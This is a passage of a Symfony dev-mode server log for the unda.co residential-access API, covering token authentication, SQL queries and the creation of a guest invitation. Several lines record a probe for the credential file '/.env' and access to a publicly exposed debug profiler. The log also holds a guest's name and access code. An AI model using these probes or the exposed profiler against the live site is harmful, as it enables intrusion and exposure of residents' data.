  275. [2025-12-16 01:00:09] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["9981ff30bf4dfeecd417d0c922 [...]"] []
  276. [2025-12-16 01:00:09] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [394] []
  277. [2025-12-16 01:00:09] security.DEBUG: Cannot refresh token because user has changed. {"username":"","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  278. [2025-12-16 01:00:09] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  279. [2025-12-16 01:00:09] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  280. [2025-12-16 01:00:09] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  281. [2025-12-16 01:00:09] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  282. [2025-12-16 01:00:09] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  283. [2025-12-16 01:00:09] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["9981ff30bf4dfeecd417d0c922 [...]"] []
  284. [2025-12-16 01:00:09] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [394] []
  285. [2025-12-16 01:00:09] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  286. [2025-12-16 01:00:09] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  287. [2025-12-16 01:00:09] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  288. [2025-12-16 01:00:09] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  289. [2025-12-16 01:00:27] request.INFO: Matched route "invitation_create". {"route":"invitation_create","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\InvitationController::invitationCreateAction","domain":"api.unda.co","_route":"invitation_create"},"request_uri":"https://api.unda.co/invitation/create","method":"POST"} []
  290. [2025-12-16 01:00:27] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  291. [2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["9981ff30bf4dfeecd417d0c922 [...]"] []
  292. [2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [394] []
  293. [2025-12-16 01:00:27] security.DEBUG: Cannot refresh token because user has changed. {"username":"","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  294. [2025-12-16 01:00:27] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  295. [2025-12-16 01:00:27] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  296. [2025-12-16 01:00:27] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  297. [2025-12-16 01:00:27] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  298. [2025-12-16 01:00:27] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  299. [2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["9981ff30bf4dfeecd417d0c922 [...]"] []
  300. [2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [394] []
  301. [2025-12-16 01:00:27] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  302. [2025-12-16 01:00:27] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  303. [2025-12-16 01:00:27] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  304. [2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a41ce4c3-29d5-4f1f-9146-ae [...]"] []
  305. [2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [394,270,1] []
  306. [2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["8521ca3b-69bb-4665-9c69-25 [...]"] []
  307. [2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a41ce4c3-29d5-4f1f-9146-ae [...]"] []
  308. [2025-12-16 01:00:27] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?)) WHERE (a0_.id = ?) AND (a0_.status = ?) LIMIT 1 [394,270,1] []
  309. [2025-12-16 01:00:27] doctrine.DEBUG: "START TRANSACTION" [] []
  310. [2025-12-16 01:00:27] doctrine.DEBUG: INSERT INTO invitation (uuid, status, date_created, date_modified, name, last_name, code, image_code_path, type, subtype, date_invitation, date_start, date_end, event_id, address_id, user_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) {"1":"4a4e7a8a-6105-4bbf-b50c-0a [...]","2":1,"3":"2025-12-16 01:00:27","4":"2025-12-16 01:00:27","5":"Marisol","6":"Romero","7":"546349","8":"/invitation/b5a36dda6387f7 [...]","9":"1","10":null,"11":"2025-12-16 06:00:00","12":null,"13":null,"14":null,"15":270,"16":394} []
  311. [2025-12-16 01:00:27] doctrine.DEBUG: "COMMIT" [] []
  312. [2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [394] []
  313. [2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [270] []
  314. [2025-12-16 01:00:27] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  315. [2025-12-16 01:00:27] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"30","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"a41ce4c3-29d5-4f1f-9146-ae339979667c","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/a41ce4c3-29d5-4f1f-9146-ae339979667c/invitation/30/0?order=desc","method":"GET"} []
  316. [2025-12-16 01:00:27] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  317. [2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["9981ff30bf4dfeecd417d0c922 [...]"] []
  318. [2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [394] []
  319. [2025-12-16 01:00:27] security.DEBUG: Cannot refresh token because user has changed. {"username":"","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  320. [2025-12-16 01:00:27] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  321. [2025-12-16 01:00:27] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  322. [2025-12-16 01:00:27] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  323. [2025-12-16 01:00:27] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  324. [2025-12-16 01:00:27] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  325. [2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["9981ff30bf4dfeecd417d0c922 [...]"] []
  326. [2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [394] []
  327. [2025-12-16 01:00:27] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  328. [2025-12-16 01:00:27] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  329. [2025-12-16 01:00:27] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  330. [2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a41ce4c3-29d5-4f1f-9146-ae [...]"] []
  331. [2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [394,270,1] []
  332. [2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a41ce4c3-29d5-4f1f-9146-ae [...]"] []
  333. [2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
  334. [2025-12-16 01:00:27] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 30 OFFSET 0 [270,1] []
  335. [2025-12-16 01:00:27] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [270,1] []
  336. [2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [394] []
  337. [2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [410] []
  338. [2025-12-16 01:00:27] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  339. [2025-12-16 01:02:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  340. [2025-12-16 01:02:12] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  341. [2025-12-16 01:04:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d21a97","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d21a97","method":"GET"} []
  342. [2025-12-16 01:04:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  343. [2025-12-16 01:06:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1f2b28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1f2b28?panel=twig","method":"GET"} []
  344. [2025-12-16 01:06:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  345. [2025-12-16 01:22:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/plugins/forms/tinymce/'+(e.settings.url||"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/plugins/forms/tinymce/'+(e.settings.url||\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  346. [2025-12-16 01:26:02] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  347. [2025-12-16 01:26:02] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  348. [2025-12-16 01:26:02] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  349. [2025-12-16 01:26:02] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  350. [2025-12-16 01:26:02] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  351. [2025-12-16 01:26:02] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  352. [2025-12-16 01:26:02] security.DEBUG: Calling Authentication entry point. [] []
  353. [2025-12-16 01:26:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/plugins/forms/tinymce/'+o.source2+'"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/plugins/forms/tinymce/'+o.source2+'\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  354. [2025-12-16 01:29:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/plugins/forms/tinymce/'+o.poster+'"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/plugins/forms/tinymce/'+o.poster+'\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  355. [2025-12-16 01:34:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/plugins/forms/tinymce/'+i.url+'"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/plugins/forms/tinymce/'+i.url+'\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  356. [2025-12-16 01:40:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/plugins/forms/tinymce/'+o.source1+'"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/plugins/forms/tinymce/'+o.source1+'\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  357. [2025-12-16 01:44:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/plugins/forms/tinymce/$1"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/plugins/forms/tinymce/$1\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  358. [2025-12-16 01:46:30] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  359. [2025-12-16 01:46:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"266eb6","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/266eb6","method":"GET"} []
  360. [2025-12-16 01:46:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  361. [2025-12-16 01:46:32] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"266eb6","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/266eb6/search/results?ip=46.101.9.216&limit=10","method":"GET"} []
  362. [2025-12-16 01:46:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=46.101.9.216&limit=10","method":"GET"} []
  363. [2025-12-16 01:46:32] request.INFO: Matched route "_profiler_search". {"route":"_profiler_search","route_parameters":{"_controller":"web_profiler.controller.profiler:searchAction","_route":"_profiler_search"},"request_uri":"https://unda.co/_profiler/search?limit=10","method":"GET"} []
  364. [2025-12-16 01:46:33] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"266eb6","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/266eb6/search/results?limit=10","method":"GET"} []
  365. [2025-12-16 01:46:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?limit=10","method":"GET"} []
  366. [2025-12-16 01:46:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/latest","method":"GET"} []
  367. [2025-12-16 01:46:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  368. [2025-12-16 01:46:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"266eb6","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/266eb6?panel=request","method":"GET"} []
